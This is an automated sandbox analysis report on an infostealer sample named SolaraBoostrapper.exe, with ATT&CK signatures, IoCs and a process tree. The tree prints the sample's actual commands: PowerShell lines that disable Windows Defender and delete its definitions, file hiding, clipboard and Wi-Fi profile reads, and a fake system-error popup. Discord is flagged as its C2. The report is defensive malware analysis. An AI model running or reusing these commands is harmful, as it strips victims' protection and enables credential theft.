25206984b9059853f3f09b6ababc446e2c63eb54bce5ff2173d178a8acff6780

Analysis

max time kernel
130s
max time network
136s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
02/09/2024, 15:11

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

SolaraBoostrapper.exe
Size

6.0MB
MD5

05f2fde0f8f71c04fd1263965d648e7c
SHA1

17aa36a2f0fe9142f7a6ec4585512a35d5ad9d9d
SHA256

25206984b9059853f3f09b6ababc446e2c63eb54bce5ff2173d178a8acff6780
SHA512

e245539db5b0d1f19b5b388ce6c78f8cfdcea49040c9772fca5f737d9b77aff963178d81f2c9d84aa24f0f48f6a3fa470bcfc7b3aea16c8e265a5c7643ea48f5
SSDEEP

98304:61EtdFBg/amaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4R0BMXb3OJGTF:6MFLeN/FJMIDJf0gsAGK4R0uXzTF

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
984	MpCmdRun.exe

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2140	powershell.exe
2008	powershell.exe
1164	powershell.exe
1068	powershell.exe
1752	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	SolaraBoostrapper.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3784	cmd.exe
316	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4168	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe
4128	SolaraBoostrapper.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 63 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000001aaa9-21.dat	upx
behavioral2/memory/4128-25-0x00007FF9CB350000-0x00007FF9CB7BE000-memory.dmp	upx
behavioral2/files/0x000700000001aa9c-28.dat	upx
behavioral2/memory/4128-30-0x00007FF9CF820000-0x00007FF9CF844000-memory.dmp	upx
behavioral2/files/0x000700000001aa9f-44.dat	upx
behavioral2/files/0x000700000001aa9e-43.dat	upx
behavioral2/files/0x000700000001aaa3-48.dat	upx
behavioral2/files/0x000700000001aaa2-47.dat	upx
behavioral2/files/0x000700000001aaa1-46.dat	upx
behavioral2/files/0x000700000001aaa0-45.dat	upx
behavioral2/files/0x000700000001aa9d-42.dat	upx
behavioral2/files/0x000800000001aa9b-41.dat	upx
behavioral2/files/0x000700000001aaae-40.dat	upx
behavioral2/files/0x000700000001aaad-39.dat	upx
behavioral2/files/0x000700000001aaac-38.dat	upx
behavioral2/files/0x000700000001aaa8-35.dat	upx
behavioral2/files/0x000700000001aaa6-34.dat	upx
behavioral2/memory/4128-32-0x00007FF9CF810000-0x00007FF9CF81F000-memory.dmp	upx
behavioral2/files/0x000700000001aaa7-31.dat	upx
behavioral2/memory/4128-54-0x00007FF9CC800000-0x00007FF9CC82D000-memory.dmp	upx
behavioral2/memory/4128-56-0x00007FF9CF7F0000-0x00007FF9CF809000-memory.dmp	upx
behavioral2/memory/4128-58-0x00007FF9CC7E0000-0x00007FF9CC7FF000-memory.dmp	upx
behavioral2/memory/4128-60-0x00007FF9CBDA0000-0x00007FF9CBF11000-memory.dmp	upx
behavioral2/memory/4128-62-0x00007FF9CC7C0000-0x00007FF9CC7D9000-memory.dmp	upx
behavioral2/memory/4128-64-0x00007FF9CF7D0000-0x00007FF9CF7DD000-memory.dmp	upx
behavioral2/memory/4128-66-0x00007FF9CC790000-0x00007FF9CC7BE000-memory.dmp	upx
behavioral2/memory/4128-70-0x00007FF9CB350000-0x00007FF9CB7BE000-memory.dmp	upx
behavioral2/memory/4128-74-0x00007FF9CF820000-0x00007FF9CF844000-memory.dmp	upx
behavioral2/memory/4128-73-0x00007FF9BD060000-0x00007FF9BD3D5000-memory.dmp	upx
behavioral2/memory/4128-71-0x00007FF9CBCE0000-0x00007FF9CBD98000-memory.dmp	upx
behavioral2/memory/4128-79-0x00007FF9CC180000-0x00007FF9CC18D000-memory.dmp	upx
behavioral2/memory/4128-78-0x00007FF9CC800000-0x00007FF9CC82D000-memory.dmp	upx
behavioral2/memory/4128-76-0x00007FF9CC770000-0x00007FF9CC784000-memory.dmp	upx
behavioral2/memory/4128-81-0x00007FF9CF7F0000-0x00007FF9CF809000-memory.dmp	upx
behavioral2/memory/4128-89-0x00007FF9CBDA0000-0x00007FF9CBF11000-memory.dmp	upx
behavioral2/memory/4128-85-0x00007FF9CC7E0000-0x00007FF9CC7FF000-memory.dmp	upx
behavioral2/memory/4128-82-0x00007FF9CAD80000-0x00007FF9CAE98000-memory.dmp	upx
behavioral2/memory/4128-96-0x00007FF9CC7C0000-0x00007FF9CC7D9000-memory.dmp	upx
behavioral2/memory/4128-196-0x00007FF9CC790000-0x00007FF9CC7BE000-memory.dmp	upx
behavioral2/memory/4128-243-0x00007FF9CBCE0000-0x00007FF9CBD98000-memory.dmp	upx
behavioral2/memory/4128-278-0x00007FF9BD060000-0x00007FF9BD3D5000-memory.dmp	upx
behavioral2/memory/4128-427-0x00007FF9CBDA0000-0x00007FF9CBF11000-memory.dmp	upx
behavioral2/memory/4128-431-0x00007FF9CBCE0000-0x00007FF9CBD98000-memory.dmp	upx
behavioral2/memory/4128-430-0x00007FF9CC790000-0x00007FF9CC7BE000-memory.dmp	upx
behavioral2/memory/4128-421-0x00007FF9CB350000-0x00007FF9CB7BE000-memory.dmp	upx
behavioral2/memory/4128-426-0x00007FF9CC7E0000-0x00007FF9CC7FF000-memory.dmp	upx
behavioral2/memory/4128-422-0x00007FF9CF820000-0x00007FF9CF844000-memory.dmp	upx
behavioral2/memory/4128-516-0x00007FF9CB350000-0x00007FF9CB7BE000-memory.dmp	upx
behavioral2/memory/4128-539-0x00007FF9CF7D0000-0x00007FF9CF7DD000-memory.dmp	upx
behavioral2/memory/4128-545-0x00007FF9CAD80000-0x00007FF9CAE98000-memory.dmp	upx
behavioral2/memory/4128-547-0x00007FF9CF820000-0x00007FF9CF844000-memory.dmp	upx
behavioral2/memory/4128-544-0x00007FF9CC180000-0x00007FF9CC18D000-memory.dmp	upx
behavioral2/memory/4128-543-0x00007FF9CC770000-0x00007FF9CC784000-memory.dmp	upx
behavioral2/memory/4128-541-0x00007FF9CBCE0000-0x00007FF9CBD98000-memory.dmp	upx
behavioral2/memory/4128-540-0x00007FF9CC790000-0x00007FF9CC7BE000-memory.dmp	upx
behavioral2/memory/4128-537-0x00007FF9CBDA0000-0x00007FF9CBF11000-memory.dmp	upx
behavioral2/memory/4128-536-0x00007FF9CC7E0000-0x00007FF9CC7FF000-memory.dmp	upx
behavioral2/memory/4128-535-0x00007FF9CF7F0000-0x00007FF9CF809000-memory.dmp	upx
behavioral2/memory/4128-534-0x00007FF9CC800000-0x00007FF9CC82D000-memory.dmp	upx
behavioral2/memory/4128-531-0x00007FF9CB350000-0x00007FF9CB7BE000-memory.dmp	upx
behavioral2/memory/4128-546-0x00007FF9BD060000-0x00007FF9BD3D5000-memory.dmp	upx
behavioral2/memory/4128-538-0x00007FF9CC7C0000-0x00007FF9CC7D9000-memory.dmp	upx
behavioral2/memory/4128-533-0x00007FF9CF810000-0x00007FF9CF81F000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
12	discord.com
13	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com
10	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3284	tasklist.exe
2256	tasklist.exe
3780	tasklist.exe
4588	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2852	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4452	cmd.exe
4956	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4064	cmd.exe
984	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5056	WMIC.exe
4408	WMIC.exe
4808	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2832	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4956	PING.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
2140	powershell.exe
1164	powershell.exe
1164	powershell.exe
2140	powershell.exe
1164	powershell.exe
2140	powershell.exe
2008	powershell.exe
2008	powershell.exe
2008	powershell.exe
316	powershell.exe
316	powershell.exe
3416	powershell.exe
3416	powershell.exe
316	powershell.exe
3416	powershell.exe
316	powershell.exe
3416	powershell.exe
1068	powershell.exe
1068	powershell.exe
1068	powershell.exe
4612	powershell.exe
4612	powershell.exe
4612	powershell.exe
1752	powershell.exe
1752	powershell.exe
1752	powershell.exe
3484	powershell.exe
3484	powershell.exe
3484	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3284	tasklist.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeIncreaseQuotaPrivilege	4448	WMIC.exe
Token: SeSecurityPrivilege	4448	WMIC.exe
Token: SeTakeOwnershipPrivilege	4448	WMIC.exe
Token: SeLoadDriverPrivilege	4448	WMIC.exe
Token: SeSystemProfilePrivilege	4448	WMIC.exe
Token: SeSystemtimePrivilege	4448	WMIC.exe
Token: SeProfSingleProcessPrivilege	4448	WMIC.exe
Token: SeIncBasePriorityPrivilege	4448	WMIC.exe
Token: SeCreatePagefilePrivilege	4448	WMIC.exe
Token: SeBackupPrivilege	4448	WMIC.exe
Token: SeRestorePrivilege	4448	WMIC.exe
Token: SeShutdownPrivilege	4448	WMIC.exe
Token: SeDebugPrivilege	4448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4448	WMIC.exe
Token: SeRemoteShutdownPrivilege	4448	WMIC.exe
Token: SeUndockPrivilege	4448	WMIC.exe
Token: SeManageVolumePrivilege	4448	WMIC.exe
Token: 33	4448	WMIC.exe
Token: 34	4448	WMIC.exe
Token: 35	4448	WMIC.exe
Token: 36	4448	WMIC.exe
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeIncreaseQuotaPrivilege	4448	WMIC.exe
Token: SeSecurityPrivilege	4448	WMIC.exe
Token: SeTakeOwnershipPrivilege	4448	WMIC.exe
Token: SeLoadDriverPrivilege	4448	WMIC.exe
Token: SeSystemProfilePrivilege	4448	WMIC.exe
Token: SeSystemtimePrivilege	4448	WMIC.exe
Token: SeProfSingleProcessPrivilege	4448	WMIC.exe
Token: SeIncBasePriorityPrivilege	4448	WMIC.exe
Token: SeCreatePagefilePrivilege	4448	WMIC.exe
Token: SeBackupPrivilege	4448	WMIC.exe
Token: SeRestorePrivilege	4448	WMIC.exe
Token: SeShutdownPrivilege	4448	WMIC.exe
Token: SeDebugPrivilege	4448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4448	WMIC.exe
Token: SeRemoteShutdownPrivilege	4448	WMIC.exe
Token: SeUndockPrivilege	4448	WMIC.exe
Token: SeManageVolumePrivilege	4448	WMIC.exe
Token: 33	4448	WMIC.exe
Token: 34	4448	WMIC.exe
Token: 35	4448	WMIC.exe
Token: 36	4448	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2140	powershell.exe
Token: SeSecurityPrivilege	2140	powershell.exe
Token: SeTakeOwnershipPrivilege	2140	powershell.exe
Token: SeLoadDriverPrivilege	2140	powershell.exe
Token: SeSystemProfilePrivilege	2140	powershell.exe
Token: SeSystemtimePrivilege	2140	powershell.exe
Token: SeProfSingleProcessPrivilege	2140	powershell.exe
Token: SeIncBasePriorityPrivilege	2140	powershell.exe
Token: SeCreatePagefilePrivilege	2140	powershell.exe
Token: SeBackupPrivilege	2140	powershell.exe
Token: SeRestorePrivilege	2140	powershell.exe
Token: SeShutdownPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeSystemEnvironmentPrivilege	2140	powershell.exe
Token: SeRemoteShutdownPrivilege	2140	powershell.exe
Token: SeUndockPrivilege	2140	powershell.exe
Token: SeManageVolumePrivilege	2140	powershell.exe
Token: 33	2140	powershell.exe
Token: 34	2140	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4112 wrote to memory of 4128	4112	SolaraBoostrapper.exe	70
PID 4112 wrote to memory of 4128	4112	SolaraBoostrapper.exe	70
PID 4128 wrote to memory of 1536	4128	SolaraBoostrapper.exe	71
PID 4128 wrote to memory of 1536	4128	SolaraBoostrapper.exe	71
PID 4128 wrote to memory of 1364	4128	SolaraBoostrapper.exe	72
PID 4128 wrote to memory of 1364	4128	SolaraBoostrapper.exe	72
PID 4128 wrote to memory of 216	4128	SolaraBoostrapper.exe	73
PID 4128 wrote to memory of 216	4128	SolaraBoostrapper.exe	73
PID 4128 wrote to memory of 2104	4128	SolaraBoostrapper.exe	113
PID 4128 wrote to memory of 2104	4128	SolaraBoostrapper.exe	113
PID 1536 wrote to memory of 2140	1536	cmd.exe	79
PID 1536 wrote to memory of 2140	1536	cmd.exe	79
PID 4128 wrote to memory of 2248	4128	SolaraBoostrapper.exe	80
PID 4128 wrote to memory of 2248	4128	SolaraBoostrapper.exe	80
PID 2104 wrote to memory of 3284	2104	cmd.exe	82
PID 2104 wrote to memory of 3284	2104	cmd.exe	82
PID 2248 wrote to memory of 4448	2248	cmd.exe	83
PID 2248 wrote to memory of 4448	2248	cmd.exe	83
PID 1364 wrote to memory of 1164	1364	cmd.exe	84
PID 1364 wrote to memory of 1164	1364	cmd.exe	84
PID 216 wrote to memory of 5008	216	cmd.exe	85
PID 216 wrote to memory of 5008	216	cmd.exe	85
PID 4128 wrote to memory of 4172	4128	SolaraBoostrapper.exe	87
PID 4128 wrote to memory of 4172	4128	SolaraBoostrapper.exe	87
PID 4172 wrote to memory of 2176	4172	cmd.exe	147
PID 4172 wrote to memory of 2176	4172	cmd.exe	147
PID 4128 wrote to memory of 2496	4128	SolaraBoostrapper.exe	91
PID 4128 wrote to memory of 2496	4128	SolaraBoostrapper.exe	91
PID 2496 wrote to memory of 1824	2496	cmd.exe	94
PID 2496 wrote to memory of 1824	2496	cmd.exe	94
PID 1364 wrote to memory of 984	1364	cmd.exe	130
PID 1364 wrote to memory of 984	1364	cmd.exe	130
PID 4128 wrote to memory of 3728	4128	SolaraBoostrapper.exe	95
PID 4128 wrote to memory of 3728	4128	SolaraBoostrapper.exe	95
PID 3728 wrote to memory of 5056	3728	cmd.exe	97
PID 3728 wrote to memory of 5056	3728	cmd.exe	97
PID 4128 wrote to memory of 3788	4128	SolaraBoostrapper.exe	182
PID 4128 wrote to memory of 3788	4128	SolaraBoostrapper.exe	182
PID 3788 wrote to memory of 4408	3788	cmd.exe	169
PID 3788 wrote to memory of 4408	3788	cmd.exe	169
PID 4128 wrote to memory of 2852	4128	SolaraBoostrapper.exe	101
PID 4128 wrote to memory of 2852	4128	SolaraBoostrapper.exe	101
PID 4128 wrote to memory of 2900	4128	SolaraBoostrapper.exe	179
PID 4128 wrote to memory of 2900	4128	SolaraBoostrapper.exe	179
PID 2852 wrote to memory of 3628	2852	cmd.exe	105
PID 2852 wrote to memory of 3628	2852	cmd.exe	105
PID 2900 wrote to memory of 2008	2900	cmd.exe	106
PID 2900 wrote to memory of 2008	2900	cmd.exe	106
PID 4128 wrote to memory of 4608	4128	SolaraBoostrapper.exe	107
PID 4128 wrote to memory of 4608	4128	SolaraBoostrapper.exe	107
PID 4608 wrote to memory of 2256	4608	cmd.exe	109
PID 4608 wrote to memory of 2256	4608	cmd.exe	109
PID 4128 wrote to memory of 4564	4128	SolaraBoostrapper.exe	110
PID 4128 wrote to memory of 4564	4128	SolaraBoostrapper.exe	110
PID 4128 wrote to memory of 3784	4128	SolaraBoostrapper.exe	111
PID 4128 wrote to memory of 3784	4128	SolaraBoostrapper.exe	111
PID 4128 wrote to memory of 2104	4128	SolaraBoostrapper.exe	113
PID 4128 wrote to memory of 2104	4128	SolaraBoostrapper.exe	113
PID 4128 wrote to memory of 4604	4128	SolaraBoostrapper.exe	150
PID 4128 wrote to memory of 4604	4128	SolaraBoostrapper.exe	150
PID 4128 wrote to memory of 4064	4128	SolaraBoostrapper.exe	118
PID 4128 wrote to memory of 4064	4128	SolaraBoostrapper.exe	118
PID 4128 wrote to memory of 5100	4128	SolaraBoostrapper.exe	120
PID 4128 wrote to memory of 5100	4128	SolaraBoostrapper.exe	120

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3628	attrib.exe
2748	attrib.exe
4164	attrib.exe

C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4112
- C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe
  "C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1164
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('your device is outdated or not updated if you think this is wrong message support', 0, 'system error', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:216
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('your device is outdated or not updated if you think this is wrong message support', 0, 'system error', 48+16);close()"
      4⤵
      PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2104
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4172
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2496
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3788
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2852
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe"
      4⤵
      Views/modifies file attributes
      PID:3628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4608
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4564
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:5044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2104
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4604
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4064
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5100
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4180
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 